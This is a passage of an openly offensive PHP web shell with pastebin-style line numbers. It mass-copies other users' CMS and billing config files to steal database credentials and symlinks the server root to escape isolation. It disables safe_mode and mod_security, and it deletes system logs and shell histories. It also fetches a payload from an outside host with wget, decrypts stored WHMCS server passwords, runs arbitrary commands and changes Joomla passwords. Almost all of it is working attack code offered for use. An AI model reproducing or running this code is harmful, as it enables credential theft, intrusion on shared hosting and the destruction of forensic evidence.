  387. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
  388. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
  389. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
  390. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
  391. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
  392. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
  393. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
  394. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
  395. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
  396. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
  397. symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  398. symlink('/home/'.$user.'/public_html/includes/config.php',$user.' <~ VBULLETIN.txt');
  399. symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  400. symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.' <~ VBULLETIN.txt');
  401. symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.' <~ VBULLETIN.txt');
  402. symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  403. symlink('/home/'.$user.'/public_html/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  404. symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  405. symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  406. symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  407. symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  408. symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.' <~ OSCOMMERCE.txt');
  409. symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  410. copy('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  411. copy('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  412. copy('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  413. copy('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  414. copy('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  415. copy('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  416. copy('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  417. copy('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  418. copy('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  419. copy('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  420. copy('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  421. copy('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  422. copy('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  423. copy('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  424. copy('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  425. copy('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  426. copy('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  427. copy('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  428. copy('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  429. copy('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  430. copy('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  431. copy('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  432. copy('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  433. copy('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  434. copy('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  435. copy('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  436. copy('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  437. copy('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  438. copy('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  439. copy('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  440. copy('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  441. symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  442. symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  443. symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  444. symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  445. symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  446. symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  447. symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  448. symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  449. symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  450. symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  451. symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  452. symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  453. symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  454. symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  455. symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  456. symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  457. symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  458. /*You Can ReCoded But Don't Change ©CopyRight*/
  459. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  460. symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  461. symlink('/home/'.$user.'/public_html/submitticket.php',$user.' <~ WHMCS.txt');
  462. symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  463. symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  464. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  465. symlink('/home/'.$user.'/public_html/site/configuration.php',$user.' <~ JOOMLA.txt');
  466. symlink('/home/'.$user.'/public_html/main/configuration.php',$user.' <~ JOOMLA.txt');
  467. symlink('/home/'.$user.'/public_html/home/configuration.php',$user.' <~ JOOMLA.txt');
  468. symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  469. symlink('/home/'.$user.'/public_html/test/configuration.php',$user.' <~ JOOMLA.txt');
  470. symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  471. symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  472. symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  473. symlink('/home/'.$user.'/public_html/new/configuration.php',$user.' <~ JOOMLA.txt');
  474. symlink('/home/'.$user.'/public_html/bb-config.php',$user.' <~ BOXBILLING.txt');
  475. symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.' <~ BOXBILLING.txt');
  476. symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.' <~ BOXBILLING.txt');
  477. symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.' <~ BOXBILLING.txt');
  478. symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.' <~ BOXBILLING.txt');
  479. symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.' <~ BOXBILLING.txt');
  480. symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.' <~ BOXBILLING.txt');
  481. symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.' <~ BOXBILLING.txt');
  482. symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.' <~ BOXBILLING.txt');
  483. symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  484. symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.' <~ BOXBILLING.txt');
  485. symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.' <~ BOXBILLING.txt');
  486. symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.' <~ BOXBILLING.txt');
  487. symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.' <~ BOXBILLING.txt');
  488. symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.' <~ BOXBILLING.txt');
  489. symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.' <~ BOXBILLING.txt');
  490. symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.' <~ BOXBILLING.txt');
  491. symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.' <~ BOXBILLING.txt');
  492. symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.' <~ BOXBILLING.txt');
  493. /*You Can ReCoded But Don't Change ©CopyRight*/
  494. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  495. symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  496. symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  497. symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  498. symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  499. symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.' <~ ZENCART.txt');
  500. symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  501. symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  502. symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  503. symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  504. symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  505. symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  506. symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  507. symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  508. symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  509. symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  510. symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  511. symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  512. symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  513. symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  514. symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  515. symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  516. symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  517. symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.' <~ HOSTBILLS.txt');
  518. copy('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  519. symlink('/home/'.$user.'/public_html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  520. copy('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  521. symlink('/home/'.$user.'/public_html/bw-configs/config.ini',$user.' <~ BOSWEB.txt');
  522. copy('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  523.  
  524. symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.' <~ LOKOMEDIA.txt');
  525.  
  526. copy('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  527. symlink('/home/'.$user.'/public_html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  528. copy('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  529. symlink('/home/'.$user.'/public_html/slconfig.php',$user.' <~ SITELOK.txt');
  530.  
  531. }
  532. echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
  533. }
  534.  
  535. }
  536.  
  537. if($_POST['azzatssins2']){
  538. error_reporting(0);
  539. echo '<center><h2>Just View Directory Another User, Readable or Not</h2><br><hr><br>List of Readable<br><hr><br></center><table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  540. <td align="center"> <font color="violet"> <b>USERS PATH</b></td>
  541. <td align="center"> <font color="violet"> <b>DOMAINS</b></td>
  542.  
  543. ';
  544. //$us = file_get_contents("/etc/passwd");
  545. $usa = fopen('/etc/passwd','r');
  546. $dir = mkdir('jump', 0777);
  547. $rrrr = "Options all \n DirectoryIndex jump \n Require None \n Satisfy Any";
  548. $frr = fopen('jump/.htaccess', 'w');
  549.  
  550. fwrite($frr, $rrrr);
  551. while($us = fgets($usa)){
  552. if($us==""){
  553.     echo "<font color=red><b>Can't read /etc/passwd</b></font><br><br>";
  554. }
  555. else{
  556. preg_match_all('/(.*?):x:/', $us, $user_byk);
  557.  
  558.     foreach($user_byk[1] as $user){
  559.         $dir1 = "/home/$user/public_html/";
  560.         if(is_readable($dir1)){
  561.            echo "<tr>
  562. <td><i><font color=green>$dir1</font></i></td>";
  563.  
  564.       $domainns = file_get_contents("/etc/named.conf");
  565.       if($domainns==""){
  566.         echo "<font color=red><b>Can't read /etc/named.conf</b></font><br><br>";
  567.       }
  568.       else{
  569.  
  570.       preg_match_all("#/var/named/(.*?).db#", $domainns, $domains);
  571.       foreach($domains[1] as $domain){
  572.        
  573.       $user2 = posix_getpwuid(@fileowner("/etc/valiases/$domain"));
  574.       $user2 = $user2['name'];
  575.       if ($user2=="$user"){
  576.         echo "<td><a class='azzatssins' href='http://".$domain." '><font color=lime>".$domain."</font></td>";
  577.         break;
  578.     }
  579.   }
  580.  
  581. }
  582.        }
  583.         else{
  584.            
  585.         }
  586.  
  587.    }
  588.  
  589. }
  590.  
  591. }
  592.  
  593. echo "</tr></table>";
  594.  
  595. }
  596. if($_POST['azzatssins3']){
  597.  
  598. @mkdir('azx',0777);
  599. $htcs = "Options Indexes FollowSymLinks \nDirectoryIndex azzatssins.htm \nAddType txt .php \nAddHandler txt .php";
  600. $f =@fopen ('azx/.htaccess','w');
  601. fwrite($f , $htcs);
  602. @symlink("/","azx/root");
  603.  
  604. $pg = basename(__FILE__);
  605. if(!is_file('named.txt')){
  606.  
  607. $d00m = @file("/etc/named.conf");
  608.  
  609. }else{
  610.  
  611. $d00m = @file("named.txt");
  612.  
  613. }
  614. if(!$d00m)
  615. {
  616.  
  617. die ("<center><font color=red><b>Can't Read /etc/passwd</b></font></center>");
  618. }
  619. else
  620.  
  621. {
  622. echo "<div class='azzatssins'><table align='center' width='40%'><td>DOMAINS</td><td>USERS</td><td>SYMLINK</td>";
  623. foreach($d00m as $dom){
  624.  
  625. if(eregi("zone",$dom)){
  626.  
  627. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  628.  
  629. flush();
  630.  
  631. if(strlen(trim($domsws[1][0])) > 2){
  632.  
  633. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  634.  
  635. flush();
  636.  
  637. $site = $user['name'] ;
  638.  
  639. @symlink("/","azx/root");
  640.  
  641. $site = $domsws[1][0];
  642.  
  643. $ir = 'ir';
  644.  
  645. $il = 'il';
  646.  
  647. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  648. {
  649. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  650. }
  651. echo "
  652. <tr>
  653. <td>
  654. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  655. </td>
  656. <td>
  657. ".$user['name']."
  658. </td>
  659. <td>
  660. <a href='azx/root/home/".$user['name']."/public_html' target='_blank'>Symlink </a>
  661. </td>
  662. </tr></div> ";
  663.  
  664. flush();
  665. flush();
  666.  
  667. }
  668. }
  669. }
  670. }
  671. }
  672. if($_POST['azzatssins4']){
  673. @session_start();
  674. @set_time_limit(0);
  675. @ini_set('max_execution_time',0);
  676. @mkdir('xazs',0777);
  677. $sempak  = "Options all \n
  678. DirectoryIndex azzatssins.html \n
  679. AddType text/plain .php \n
  680. AddHandler server-parsed .php \n  
  681. AddType text/plain .html \n
  682. AddHandler txt .html \n
  683. Require None \n
  684. Satisfy Any";
  685. $masuk =@fopen ('xazs/.htaccess','w');
  686. fwrite($masuk ,$sempak);
  687. @symlink('/','xazs/azzatssins.txt');  
  688. $pg = basename(__FILE__);
  689.  
  690.  
  691. if(is_readable("/var/named")){
  692. echo '<table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
  693. <td align="center"> <font color="white"> <b>DOMAINS</b></td>
  694. <td align="center"> <font color="white"> <b>USERS</b></td>
  695. <td align="center"> <font color="white"> <b>SYMLINK</b></center></td>';
  696. $list = scandir("/var/named");
  697. foreach($list as $domain){
  698. if(strpos($domain,".db")){
  699. @error_reporting(0);
  700. @ini_set('log_errors',0);
  701. @ini_set('error_log',NULL);
  702.  
  703. $i += 1;
  704. $domain = str_replace('.db','',$domain);
  705. $owner = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
  706. echo "<tr>
  707. <td><a class='azzatssins' href='http://".$domain." '>".$domain."</a></td>
  708. <td align='center'><font color='white'>".$owner['name']."</td>
  709. <td align='center'><a href='xazs/azzatssins.txt".$owner['dir']."/public_html/' target='_blank'>Symlink</a></td>";
  710. }
  711. }
  712. flush();
  713. flush();
  714. }
  715. echo "</tr></table></div></html>";
  716.  
  717. }
  718. if($_POST['azzatssins5']){
  719. echo ini_get("safe_mode");
  720.  echo ini_get("open_basedir");
  721.  ini_restore("safe_mode");
  722.  ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  723. fwrite($phi,"safe_mode = Off
  724. disable_functions = NONE
  725. safe_mode_gid = OFF
  726. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  727. fwrite($phii,"<IfModule mod_security.c>
  728. KillFilterEngine Off
  729. KillFilterScanPOST Off
  730. KillFilterCheckURLEncoding Off
  731. KillFilterCheckUnicodeEncoding Off
  732. </IfModule>
  733. "); }
  734. if($_POST['azzatssins7']){
  735.  
  736. if(is_readable("/etc/named.conf")){
  737.  
  738. echo '&raquo; /etc/named.conf is readable.<br />';
  739.  
  740. }else{
  741.  
  742. echo '&raquo; <font color="red">/etc/named.conf not readable</font> <br />';
  743.  
  744. }
  745.  
  746. if(is_readable("/etc/passwd")){
  747.  
  748. echo '&raquo; /etc/passwd is readable.<br />';
  749.  
  750. }else{
  751.  
  752. echo '&raquo; <font color="red">/etc/passwd not readable</font> <br />';
  753.  
  754. }
  755.  
  756. if(is_readable("/etc/valiases")){
  757.  
  758. echo '&raquo; /etc/valiases exists';
  759.  
  760. if(is_array(scandir("/etc/valiases"))){
  761.  
  762. echo ' & scanable';
  763.  
  764. }
  765.  
  766. echo '.<br />';
  767.  
  768. }else{
  769.  
  770. echo '&raquo; <font color="red">/etc/valiases not readable</font> <br />';
  771.  
  772. }
  773.  
  774. if(is_readable("/var/named")){
  775.  
  776. echo '&raquo; /var/named exists';
  777.  
  778. if(is_array(scandir("/var/named"))){
  779.  
  780. echo ' & scanable';
  781.  
  782. }
  783.  
  784. echo '.<br />';
  785.  
  786. }else{
  787.  
  788. echo '&raquo; <font color="red">/var/named not readable</font> <br />';
  789.  
  790. }
  791.  
  792. if(ini_get('disable_functions')){
  793.  
  794. echo '&raquo; '.ini_get('disable_functions').' are disabled<br />';
  795.  
  796. }
  797.  
  798. if(function_exists("symlink")){
  799.  
  800. echo '&raquo; Symlinking allowed<br />';
  801.  
  802. }else{
  803.  
  804. echo '&raquo; <font color="red">Symlinking not allowed</font> <br />';
  805.  
  806. }
  807.  
  808. if(is_writable("/var/tmp")){
  809.  
  810. echo '&raquo; /var/tmp folder is writable<br />';
  811.  
  812. }
  813.  
  814. if(is_readable('/var/log')){
  815.  
  816. echo '&raquo; /var/log folder is readable<br />';
  817.  
  818. }
  819.  
  820. die();
  821. }
  822. if($_POST['azzatssins8']){
  823. @error_reporting(0);
  824. system("rm -rf /tmp/logs");
  825. system("rm -rf /root/.bash_history");
  826. system("rm -rf /root/.ksh_history");
  827. system("rm -rf /root/.bash_logout");
  828. system("rm -rf /usr/local/apache/logs");
  829. system("rm -rf /usr/local/apache/log");
  830. system("rm -rf /var/apache/logs");
  831. system("rm -rf /var/apache/log");
  832. system("rm -rf /var/run/utmp");
  833. system("rm -rf /var/logs");
  834. system("rm -rf /var/log");
  835. system("rm -rf /var/adm");
  836. system("rm -rf /etc/wtmp");
  837. system("rm -rf /etc/utmp");
  838. system("rm -rf $HISTFILE");
  839. system("rm -rf /var/log/lastlog");
  840. system("rm -rf /var/log/wtmp");
  841. system("rm -rf cnf");system("rm -rf xazs"); system("rm -rf CONFIGRAB"); system("rm -rf azx"); system("rm -rf AZZATSSINS");system("rm -rf jump");unlink('mysql.php');unlink('wd.php'); unlink('wk.php');unlink('rw.php');
  842. system('wget -O error.php www.x-x-x.yn.lt/error.css');system('chmod 0400 error.php');
  843. $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn);echo'<meta http-equiv="Refresh" content= "0; url=?">';
  844. }
  845. elseif(isset($_GET['whmcs']) && ($_GET['whmcs'] == 'decode'))
  846. {  
  847. ?>
  848. <form action="?whmcs=decode" method="post">
  849.  
  850. <?php
  851.  
  852. function decrypt ($string,$cc_encryption_hash)
  853. {
  854.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  855.     $hash_key = _hash ($key);
  856.     $hash_length = strlen ($hash_key);
  857.     $string = base64_decode ($string);
  858.     $tmp_iv = substr ($string, 0, $hash_length);
  859.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  860.     $iv = $out = '';
  861.     $c = 0;
  862.     while ($c < $hash_length)
  863.     {
  864.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  865.         ++$c;
  866.     }
  867.     $key = $iv;
  868.     $c = 0;
  869.     while ($c < strlen ($string))
  870.     {
  871.         if (($c != 0 AND $c % $hash_length == 0))
  872.         {
  873.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  874.         }
  875.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  876.         ++$c;
  877.     }
  878.     return $out;
  879. }
  880.  
  881. function _hash ($string)
  882. {
  883.     if (function_exists ('sha1'))
  884.     {
  885.         $hash = sha1 ($string);
  886.     }
  887.     else
  888.     {
  889.         $hash = md5 ($string);
  890.     }
  891.     $out = '';
  892.     $c = 0;
  893.     while ($c < strlen ($hash))
  894.     {
  895.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  896.         $c += 2;
  897.     }
  898.     return $out;
  899. }
  900.  
  901. echo "
  902. <br>
  903.  
  904. <FORM method='post'>
  905. <input type='hidden' name='form_action' value='2'>
  906. <br>
  907. <table class=tabnet style=width:320px;padding:0 1px;>
  908. <tr><th colspan=2>WHMCS Decoder</th></tr>
  909. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  910. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  911. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  912. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  913. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  914. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  915. </table>
  916. </FORM>
  917. </center>
  918. ";
  919.  
  920.  if($_POST['form_action'] == 2 )
  921.  {
  922.  //include($file);
  923.  $db_host=($_POST['db_host']);
  924.  $db_username=($_POST['db_username']);
  925.  $db_password=($_POST['db_password']);
  926.  $db_name=($_POST['db_name']);
  927.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  928.  
  929.  
  930.  
  931.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  932.         mysql_select_db($db_name,$link) ;
  933. $query = mysql_query("SELECT * FROM tblservers");
  934. while($v = mysql_fetch_array($query)) {
  935. $ipaddress = $v['ipaddress'];
  936. $username = $v['username'];
  937. $type = $v['type'];
  938. $active = $v['active'];
  939. $hostname = $v['hostname'];
  940. echo("<center><table border='1'>");
  941. $password = decrypt ($v['password'], $cc_encryption_hash);
  942. echo("<tr><td>Type</td><td>$type</td></tr>");
  943. echo("<tr><td>Active</td><td>$active</td></tr>");
  944. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  945. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  946. echo("<tr><td>Username</td><td>$username</td></tr>");
  947. echo("<tr><td>Password</td><td>$password</td></tr>");
  948.  
  949. echo "</table><br><br></center>";
  950. }
  951.  
  952.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  953.         mysql_select_db($db_name,$link) ;
  954. $query = mysql_query("SELECT * FROM tblregistrars");
  955. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  956. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  957. while($v = mysql_fetch_array($query)) {
  958. $registrar     = $v['registrar'];
  959. $setting = $v['setting'];
  960. $value = decrypt ($v['value'], $cc_encryption_hash);
  961. if ($value=="") {
  962. $value=0;
  963. }
  964. $password = decrypt ($v['password'], $cc_encryption_hash);
  965. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  966. }
  967. }
  968. }
  969.  
  970.  
  971.  
  972.  
  973. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  974. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  975.  
  976. if( $_POST['_act'] == "Upload!" ) {
  977.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  978.         echo "<center><b>Error while uploading file!</b></center>";
  979.     } else {
  980.         echo "<center><pre>";
  981.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  982.         echo "</pre><b>File uploaded successfully!</b></center>";
  983.     }    
  984. } else {
  985.     echo "<b><br><font color='#006800'><pre><br>";
  986.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  987.     system($currentCMD);
  988.     echo "<br></pre></font><br></b>";
  989. }
  990.  
  991. if (isset($_GET['AZZATSSINS']) && ($_GET['AZZATSSINS'] == 'JPASS')) {
  992. ?>
  993. <form action="?&amp;AZZATSSINS=JPASS" method="post">
  994. <?php
  995. echo "<center><br/><br/><nobr><b><span class='b7'>O=:[ JOOMLA</span> <span class='b8'>PASS CHANGER ]:=O</span></b></nobr><br/><br/> ";
  996. if(empty($_POST['pwd'])){
  997. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL </th></tr> <tr><td>&nbsp;&nbsp;Host</td><td>
  998. <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  999. <tr><td>&nbsp;&nbsp;Database</td><td>
  1000. <input style='width:270px;' class='inputz' type='text' name='database' value='database' /></td></tr>
  1001. <tr><td>&nbsp;&nbsp;username</td><td>
  1002. <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  1003. <tr><td>&nbsp;&nbsp;password</td><td>
  1004. <input style='width:270px;' class='inputz' type='password' name='password' value='**' /></td></tr>
